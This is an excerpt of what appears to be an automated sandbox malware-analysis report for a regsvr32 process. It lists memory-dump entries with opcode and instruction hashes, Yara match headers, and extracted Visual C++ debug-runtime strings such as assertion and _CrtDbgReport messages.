                                                                                        • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                                                        • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                                                        • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ve
                                                                                        • API String ID: 0-2619166483
                                                                                        • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                                                        • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                                                        • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                                                        • Instruction Fuzzy Hash: 3B217BB16187858BC748DF28C55951ABBE1FBCC318F404B5DF8CAAA360D378D645CB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hk
                                                                                        • API String ID: 0-2736353058
                                                                                        • Opcode ID: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                                        • Instruction ID: 887fdeaeec6620913bccc1519bb94b7ab545cc472d3a2f82c737665b3ebe67cb
                                                                                        • Opcode Fuzzy Hash: f042022579c6dc077ee2635b55382d47991fd87e705928ebfd6682ca687bc5a7
                                                                                        • Instruction Fuzzy Hash: 20319CB4628384AB8388DF28C49981ABBF1FBC9304F806A1DF8868A260D775D445CB03
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @Bp!
                                                                                        • API String ID: 0-2853746471
                                                                                        • Opcode ID: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                                        • Instruction ID: a42def5e4906ba5408d95fb28ee36c9633a666dd8c6a1d0dabe2f17b10b73553
                                                                                        • Opcode Fuzzy Hash: ef82bde12d532e04876809b878463bf9d85bf8adc7e5172117a9a71904663532
                                                                                        • Instruction Fuzzy Hash: 8831F37080034E8BCB44DF64D48A4DE7FB0FB28398F11461AE869A6210D3B48694CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _&%
                                                                                        • API String ID: 0-276555772
                                                                                        • Opcode ID: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                                        • Instruction ID: 84b034befa84842a6d26d9f5413634863003efd6eec9a48b68f2958c9e87747a
                                                                                        • Opcode Fuzzy Hash: 8f3b61786a1347c07c3d5db82c2bc2daa848de2eab2d644bf824955350391771
                                                                                        • Instruction Fuzzy Hash: C3217BB06187848B8748DF28D45A51ABBE1FBCC308F404B5DF4CAAA360D3789609CB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: V
                                                                                        • API String ID: 0-2990084971
                                                                                        • Opcode ID: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                                        • Instruction ID: 19a784c3393b647e1d02845cf9d1e0035701b9012461bc7b4b972f754d4b287b
                                                                                        • Opcode Fuzzy Hash: 1782258294aa137d61fe32651e2643f77913c71ff09afc5f450ca4bece25d7e7
                                                                                        • Instruction Fuzzy Hash: E021ADB4529780AFD788DF28D09981FBBF0FB89304F806A1CF9868B360E3759445CB02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fe_
                                                                                        • API String ID: 0-1346747655
                                                                                        • Opcode ID: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                                        • Instruction ID: 9f8913945123cb4278df7be958afc5fc5d749fa594805d3e5c5ffa2821aade6f
                                                                                        • Opcode Fuzzy Hash: 656de1a6cae0373b094f44c9878c04d225c006d82b161423a6aec508986bcc20
                                                                                        • Instruction Fuzzy Hash: 25215DB55183818B9348EF28D44A51BBBE1BB8D34CF404B5DF4CEAA260D778D615CF4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                                        • Instruction ID: f4bbdddc4ebc6fe898ddfb3184844cd7ab88b5746f894e32bccfd4327ba112cf
                                                                                        • Opcode Fuzzy Hash: 690f928848312d3e50bce6c98363679f754364b802b69089bfd2d1cc95353951
                                                                                        • Instruction Fuzzy Hash: F751247152078DABDBC9DF28C8CAA9C3BA1FB44754F806219FC468A261D774D5C9CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                                        • Instruction ID: d7e3191637b78f1be9ff87ab698ad538cd7d2d45c46478ba59590cd585685a95
                                                                                        • Opcode Fuzzy Hash: a7876522931334601bd90a80625b7f157024bfeead9eee4300288ec184fcbc12
                                                                                        • Instruction Fuzzy Hash: 5761B1B490078E8FCF48DF68D8595DE7BB0FB48318F014A19FC6696250D7B49A25CB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                                        • Instruction ID: f17689cc06c9532d3252f7dc5abd3373f404a3f8166a5e21e79f0a6996b359c5
                                                                                        • Opcode Fuzzy Hash: 88e65efb6d3fa20939ff192da4dfa840d39aac14346873756c43568c41f67993
                                                                                        • Instruction Fuzzy Hash: 0B41B870608B488FC768DF19D08976ABBF1FB89711F40856EE68AC7351DB319848CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                                        • Instruction ID: 9422144e28ecc4a9930a11d21f18f8515329dd70f686b1b52883d16e1825d5f7
                                                                                        • Opcode Fuzzy Hash: 485b6be602952e656e1e94650c6f168335af82f45d0d0f5b4aa22a8c646e7c56
                                                                                        • Instruction Fuzzy Hash: 2A414D34509B588FD768DF28918A75ABBE0FF99310F004A5EE58EC7362D770D949CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                                        • Instruction ID: bbd244a3cf3555809e115011e05a98a3e8d5fd40b217627e69400f11bfb30a94
                                                                                        • Opcode Fuzzy Hash: c92699b14e6c2b4fd34943bfb19e45adab91cb197e26a720392e823bcd093906
                                                                                        • Instruction Fuzzy Hash: 745193B590434ACFCF48CF64D48A5CE7FB0FB68398F214219E856A6250D3B496A4CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                                        • Instruction ID: 8b5374169f69602128bd3032aff790cb1f354843cf4962b6e845d1f3af7287dc
                                                                                        • Opcode Fuzzy Hash: 22d6ccee6f38bff831197d2bb081fadbeca5e8b7e3ae62232a51f5952ffcfbdb
                                                                                        • Instruction Fuzzy Hash: 9741A0B180078E8BCB44CFA8D84A5DE7BF0FB18358F104A19F865A6250D3B89668CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                                                        • Instruction ID: c15f1aaae4e4e13c906589d5588e8395ab5dda45948680e718f465f07a8a5b6e
                                                                                        • Opcode Fuzzy Hash: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                                                        • Instruction Fuzzy Hash: EC41C4B190038E8FDF48CF64C84A4DE7BB0FB58358F104619E86AA7250D3B8D665CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                                        • Instruction ID: c896a4b3abc40741a1500648b31ed7fd3e584cfdc10005e9d212c87c64feccae
                                                                                        • Opcode Fuzzy Hash: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                                        • Instruction Fuzzy Hash: 2541C1B181035E8BDB48CFA8D48A5DE7FB0FB68398F204619E855A6214D3B496A4CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                                        • Instruction ID: db142853bc0ceb5379a440845187b42230294cb0dc3411c083ed269e5703ce5c
                                                                                        • Opcode Fuzzy Hash: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                                        • Instruction Fuzzy Hash: E831AFB090034E8FCB48CF68C4865DE7FB0FB58398F114219E85AA6210D3B496A5CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                                        • Instruction ID: 032a8ed253072f6fd1b05e82d0325949fdf78283cb4c6b9cd1929990fdaa7975
                                                                                        • Opcode Fuzzy Hash: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                                        • Instruction Fuzzy Hash: F93195B050078A8BCF48DF68C85A5AE3BB1FB48308B404A2DFD269A350D7B49664CB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                                        • Instruction ID: 9b1437c5de0cc84ebb9c914bb54d42d7cbbf0eefc466e3cb3beb54b329be6ed5
                                                                                        • Opcode Fuzzy Hash: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                                        • Instruction Fuzzy Hash: E631D5B190034E8FCF48DF68C48A4DE7FB1FB68398F100619E816A6250D3B896A4CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                                        • Instruction ID: e5161e45e20286f18a7c233b2d95f7c6d50d739ad8bc374cfda940a225cf7d0d
                                                                                        • Opcode Fuzzy Hash: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                                        • Instruction Fuzzy Hash: DD315C305187849BC3999B24C4C925EBEE1FB85399FA0682CF1C3C6264D774C98A8B06
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                                        • Instruction ID: e62117077ddfbae32c834d069a9ab80343e2b26cefae081dcf738b8df2b77597
                                                                                        • Opcode Fuzzy Hash: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                                        • Instruction Fuzzy Hash: B22148B56183848BD749DF28D44A41ABBE1FB9C74CF400B6DF4CAAB250D378D649CB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                                        • Instruction ID: 503aa3927fff6e4ad3ec536c6aa42fcab205a0bd32951b21a7cd1c91f46ab624
                                                                                        • Opcode Fuzzy Hash: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                                        • Instruction Fuzzy Hash: 3F2150B46187848BD748DF28C45641ABBE1FB9C358F804B2DF4CAA7350D7789A05CF4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                                        • Instruction ID: bec49874bf3906a1a9314e610e6330a75ea1af3aa415f07e7967bd5f7b72e726
                                                                                        • Opcode Fuzzy Hash: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                                        • Instruction Fuzzy Hash: 61215CB16187848BD748DF28D05941FBBE0BB8D358F405B2DF8CAA6351D7789644CB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                                                        • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                                                        • API String ID: 242677333-579931786
                                                                                        • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                        • Instruction ID: 59d0ad1821d2987490fb14e41c4dc7dbbb96a2632b775096c591c8feb24f6032
                                                                                        • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                        • Instruction Fuzzy Hash: DF321A3190CA8695EBB0CB18EC543EE73A0F784345FA04125D6CD47AA9DB7EE549CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invoke_watson_if_error$FileModuleName
                                                                                        • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                        • API String ID: 1949418964-1840610800
                                                                                        • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                        • Instruction ID: afa63f492d6c70519d8e627b7e85a2bc97528eb7c2a0a9c735d6d19596090ce3
                                                                                        • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                        • Instruction Fuzzy Hash: 90F1D636609BC694E6B0DB54E8483AEB3E4F389780F604125DACD43BB9DB7ED194CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invoke_watson_if_error$_invalid_parameter
                                                                                        • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                                                        • API String ID: 2356156361-2279852085
                                                                                        • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                        • Instruction ID: 4b7917f2e6131773ed7248c088fbaee50c31bf3d43f4cd1ee6c8c65be3a18826
                                                                                        • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                        • Instruction Fuzzy Hash: BCC1E77190DBC681EBB48B15E8803EEA3E1F389384F614126E6CD42BB9DB7ED155CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleWrite
                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                                                        • API String ID: 3320372497-2837547082
                                                                                        • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                        • Instruction ID: 0a9042e1a7d7c8a566278db251693fc707392c06de90b0eab8804e289765c981
